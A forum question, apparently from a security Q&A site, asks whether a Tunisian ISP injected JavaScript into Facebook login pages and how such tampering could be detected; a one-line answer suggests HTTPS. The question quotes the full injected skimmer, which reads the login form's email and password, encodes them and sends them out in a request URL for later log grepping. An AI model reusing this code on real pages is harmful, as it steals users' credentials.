2

This page claims that a Tunisian ISP was injecting javascript into the source code of Facebook pages:

http://www.r00ted.com/doku.php?id=injection_tunisie

function h6h(st){var st2="";for(i=0;i<st.length;i++){c=st.charCodeAt(i);ch=(c&0xF0)>>4;cl=c&0x0F;
st2=st2+String.fromCharCode(ch+97)+String.fromCharCode(cl+97);}return st2;}
function r5t(len){var st="";for(i=0;i<len;i++)st=st+String.fromCharCode(Math.floor(Math.random(1)*26+97)); return st;}
function hAAAQ3d() {
 var frm = document.getElementById("login_form"); var us3r = frm.email.value; var pa55 = frm.pass.value;
 var url = "http://www.facebook.com/wo0dh3ad?q="+r5t(5)+"&u="+h6h(us3r)+"&p="+h6h(pa55); var bnm = navigator.appName; if(bnm=='Microsoft Internet Explorer') inv0k3(url); else inv0k2(url);}
function inv0k1(url) {var objhq = document.getElementById("x6y7z8"); objhq.src = url;}
function inv0k2(url) {var xr = new XMLHttpRequest(); xr.open("GET", url, false); xr.send("");}
function inv0k3(url) {var xr = new ActiveXObject('Microsoft.XMLHTTP'); xr.open("GET", url, false); xr.send("");}

According to the page the user wo0dh3ad doesn't exist but this would allow to do a simple grep in logs to get user's passwords (or password hashes).

grep wo0dh3ad /var/log/FAI.log

Is this actually possible to do? If so, would there be a way to detect some tampering with a page just to say that something is odd and another browser/connection should be used?

1 Answer 1

2

Use SSL (HTTPS) to protect against man-in-the-middle attacks.

Your Answer

By clicking “Post Your Answer”, you agree to our terms of service and acknowledge you have read our privacy policy.

Not the answer you're looking for? Browse other questions tagged or ask your own question.